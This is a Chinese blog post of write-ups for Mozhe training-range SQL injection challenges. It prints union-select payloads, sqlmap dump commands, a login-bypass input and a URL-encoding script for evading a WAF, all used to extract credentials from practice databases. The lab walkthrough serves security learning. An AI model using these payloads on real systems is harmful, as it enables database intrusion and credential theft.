墨者 - SQL注入

Naraku

发布于 2021-07-29 11:06:28

5760

发布于 2021-07-29 11:06:28

文章被收录于专栏：Naraku的专栏Naraku的专栏

暂停更新，没墨币了

SQL注入实战-MySQL

靶场地址：https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

进入靶场发现URL为：http://url/show.php?id=MQo=，猜测此处需要将注入语句进行Base64编码。
判断注入点

-- 原语句: id=-1
id=LTE=  -- 页面返回空白,存在注入

判断列数，可知列数为3

-- 原语句: id=1 order by 2
 id=MSBvcmRlciBieSAy   -- 页面正常
 
 -- 原语句: id=1 order by 3
 id=MSBvcmRlciBieSAz   -- 页面报错

判断回显

-- 原语句: id=-1 union select 1,2
id=LTEgdW5pb24gc2VsZWN0IDEsMg==

库名：test

-- 原语句: id=-1 union select 1,database()
id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKQ==

表名：data

-- 原语句: id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKQ==

列名：id,title,main,thekey

-- 原语句: id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='data'
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J2RhdGEn

查看thekey字段内容，即可成功得到Key

-- 原语句: id=-1 union select 1,thekey from data
id=LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5IGZyb20gZGF0YQ==

SQL注入漏洞测试(布尔盲注)

靶场地址：https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面
判断注入点。分别修改id值，查看返回页面，判断此处存在注入点

?id=1 and 1=1 --+  -- 页面正常
?id=1 and 1=2 --+  -- 页面空白

判断列数。使用order by判断，可知此处列数为4

id=1 order by 4 --+   -- 页面正常
id=1 order by 5 --+   -- 页面空白

手工注入太慢了，我选择SQLMap

$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1"  -DBMS=mysql

库名：stormgroup

$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql --current-db

表名：member, notice

$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup --tables

member表中的字段：name, password, status

$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member --columns

字段内容。爆出2个账号，将第2个密码进行MD5解密后登陆即可获取Key

$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member -C "name,password" --dump

X-Forwarded-For注入漏洞实战

靶场地址：https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe

进入靶场，任意输入账号密码，点击登陆。发现页面提示IP已被记录，且从题目名可知此题为X-Forwarded-For的注入
打开Burp，再次登录后抓取数据包，并将数据包发送到重发器Repeater
手动添加X-Forwarded-For字段，点击发现。可以看到响应包的弹框中出现X-Forwarded-For字段设置的IP地址

新建一个post.txt文件，将请求包全部内容粘贴到该文件中，并将X-Forwarded-For字段修改为*

POST /index.php HTTP/1.1
Host: 219.153.49.228:46500
Content-Length: 25
Cache-Control: max-age=0
Origin: http://219.153.49.228:46500
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://219.153.49.228:46500/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: *

username=123&password=123

然后将post.txt文件放SQLMap的目录下，然后运行SQLMap，使用-r参数指定该txt
库名：webcalendar

$ python sqlmap.py -r post.txt --current-db

表名：user, login

$ python sqlmap.py -r post.txt -D webcalendar --tables

列名：id, username, password

$ python sqlmap.py -r post.txt -D webcalendar -T user --columns

爆字段内容

$ python sqlmap.py -r post.txt -D webcalendar -T user -C username,password --dump

最后在登陆界面使用爆出来的账号密码登陆即可获取Key

SQL手工注入漏洞测试(MySQL数据库)

靶场地址：https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面
判断注入点

id=1 and 1=1  -- 页面正常
id=1 and 1=2  -- 页面错误

判断列数，可知列数为4

id=1 order by 4  -- 页面正常
id=1 order by 5  -- 页面错误

判断回显点。先让前面id=-1报错，从页面回显得知回显点为2、3

id=-1 union select 1,2,3,4

爆库名：mozhe_Discuz_StormGroup

id=-1 union select 1,database(),3,4

爆表名：StormGroup_member,notice

id=-1 union select 1,(select table_name from information_schema.tables  where table_schema=database() limit 0,1),3,4
id=-1 union select 1,(select table_name from information_schema.tables  where table_schema=database() limit 1,1),3,4

猜第1个表中的列：id,name,password,status

id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 0,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 1,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 2,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 3,1),3,4

爆字段内容。此处一开始爆出的第1个密码经过MD5解密后登录提示用户被禁用，后使用limit爆出第2个账号及密码，解密后登录成功

id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

SQL手工注入漏洞测试(MySQL数据库-字符型)

靶场地址：https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面
判断注入点，此处为字符型注入

id=tingjigonggao' and 1=1 --+  -- 页面正常
id=tingjigonggao' and 1=2 --+  -- 页面错误

判断列数，可知为4

id=tingjigonggao' order by 4 --+
id=tingjigonggao' order by 5 --+

判断回显点。前面让id=x报错，从页面回显得知回显点为2、3

d=x' union select 1,2,3,4 --+

库名：mozhe_discuz_stormgroup

id=x' union select 1,2,database(),4 --+

表名：notice,stormgroup_member

id=x' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+

判断stormgroup_member表的全部字段：id,name,password,status

id=x' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member' --+

查询name,password字段的值

d=x' union select 1,name,password,4 from stormgroup_member limit 0,1 --+
d=x' union select 1,name,password,4 from stormgroup_member limit 1,1 --+

有2个账号，将第2个密码进行MD5解密后登陆即可获取Key

SQL手工注入漏洞测试(Sql Server数据库)

靶场地址：https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面
判断注入点。分别修改id值，查看返回页面，判断此处存在注入点

id=2-0  -- 返回正常
id=2-1  -- 返回错误

判断列数。使用order by判断，可知此处列数为4

id=2 order by 4  -- 返回正常
id=2 order by 5  -- 返回错误

判断回显。此处有以下3个地方需要注意
- 需要先把前面的条件设为False，即id≠2，此处为id=-2
- 使用union all select ，而非union select
- 第3个回显位为字符串型，需要用'3'

id=-2 union all select 1,2,'3',4

查询当前数据库。库名：mozhe_db_v2

id=-2 union all select 1,db_name(),'3',4

爆表，表名：manage

id=-2 union all select 1,(select top 1 name from mozhe_db_v2..sysobjects where xtype='u'),'3',4

-- 也可以使用information_schema.tables
id=-2 union all select 1,(select top 1 table_name from information_schema.tables),'3',4

爆列，列名：id,username,password

id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4


-- 也可以使用information_schema.columns,但是使用前面的方便遍历
id=-2 union all select 1,(select  top 1 column_name from information_schema.columns where table_name='manage'),'3',4

爆字段内容，使用第1条爆用户名为admin_mz，再使用第2条爆出密码

id=-2 union all select 1,(select username from manage),'3',4
id=-2 union all select 1,(select username from manage),(select password from manage where username='admin_mz'),4

最后将用户名和MD5解密后的密码填入登录页，即可获取key

SQL过滤字符后手工绕过漏洞测试(万能口令)

靶场地址：https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe

Emmm这题好水，居然还收2个墨币！

根据提示输入用户名为admin，密码任意，点击登陆
发现页面提示登陆失败，然后看了一下URL：http://url/no.php，然后改成yes.php，居然就显示Key了。。。

下面来一个正确的做法

账号输入admin111'2222，密码随意，点击登陆
页面报错如下：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2222','a','a') and password='1'' at line 1

再次构造账号：admin','a','a') # ，密码任意。点击登陆成功获取Key

SQL过滤字符后手工注入漏洞测试(第1题)

靶场地址：https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面
判断注入点

id=1   -- 页面正常
id=-1  -- 页面错误

一开始直接判断列数，但是order by一直没有报错，后发现需要绕过。经查询得知此题绕过需要注意以下几点：
- 空格用/**/代替，=用like代替
- id=1后面部分进行URL编码
这里有个坑就是网上很多在线转换工具编码并不完全，很多英文字母没有进行编码。好不容易找到一款可以完全转16进制形式的ASCII的url编码工具，但是当我转一句爆库名的语句后直接给云盾拦截了，后来使用本地的小葵转换工具解决。没有的话可以用Python写一个小脚本，附一个别人写的脚本：

# !/usr/bin/env python
# -*- coding:UTF-8 -*-
# time:2019/11/9  1:03
# author:White9527
from urllib import parse
import re 
 
# 查询语句
s1 = "/**/order/**/by/**/1"
s2 = parse.quote(s1,"utf-8")
s3 = re.findall(r'.',s2)
j = 0 
for i in s3:
    if (s3[j]!='%' and s3[j-1]!='%' and s3[j-2]!='%'):
        s3[j] = hex(ord(s3[j]))
    j=j+1
s4 = "".join(s3)
s4 = re.sub("0x","%",s4)
print(s4)

判断列数，可知列数为4

-- 原语句: id=1/**/order/**/by/**/4
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%34  -- 页面正常
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%35  -- 页面错误

判断回显点。先让前面id=-1报错，从页面回显得知回显点为2、3

-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34

库名：mozhe_discuz_stormgroup

-- 原语句: id=-1/**/union/**/select/**/1,database(),3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34

表名：notice,stormgroup_member

-- 原语句: id=-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29

爆stormgroup_member表中的字段名：id,name,password,status

-- 原语句: id=-1/**/union/**/select/**/1,(group_concat(column_name)),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%28%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27

爆字段内容，一共有3个用户，第3个才是正确的

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31

SQL过滤字符后手工注入漏洞测试(第2题)

靶场地址：https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面。
判断注入点。

id=1   -- 页面正常
id=-1  -- 页面错误

判断列数。可知列数为4

id=1/**/order/**/by/**/4  -- 页面正常
id=1/**/order/**/by/**/5  -- 页面错误

判断回显。这里过滤了union和select，尝试大小写绕过无效，于是使用URL编码

-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%33%2C%34

库名：mozhe_discuz_stormgroup

-- 原语句: id=-1/**/union/**/select/**/1,2,database(),4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%64%61%74%61%62%61%73%65%28%29%2C%34

表名：notice,stormgroup_member。这里使用group_concat()将表名拼接后返回

-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/database()

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%3D%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29

爆stormgroup_member表中的列名：id,length,name,password,time,status

-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'stormgroup_member'

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%3D%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27

查看name,password字段内容，分别爆出3个账号：mozhe01,mozhe2,admin。将最后一个admin对应的密码MD5解密后即可成功登陆并获取Key

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/1,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31

SQL过滤字符后手工注入漏洞测试(第3题)

靶场地址：https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

进入靶场，点击登录框下方的通知，进入通知页面。
判断注入点，这里为字符型注入

id=1' and 1=1 --+   -- 页面正常
id=1' and 1=2 --+   -- 页面错误

判断列数。可知列数为7

?id=1' order by 7 --+ -- 页面正常
?id=1' order by 8 --+ -- 页面错误

判断回显。发现回显位置为：2,3,4

id=-1'  union select 1,2,3,4,5,6,7 --+

库名：min_ju4t_mel1i

id=-1' union select 1,database(),3,4,5,6,7 --+

表名：(@dmin9_td4b},notice,stormgroup_member,tdb_goods

id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() --+

这里发现第1个表名比较奇怪，看看这个表有什么列：id,username,password,status

id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}' --+

查看字段内容。这里一开始使用group_concat()函数，但是返回的密码不方便观察，干脆使用limit逐个返回。
- Tips：这里一共有5个账号，前面4个的status字段均为0，只有最后一个的status为1。猜测这个字段表示是否禁用。

?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 0,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 1,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 2,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 3,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 4,1 --+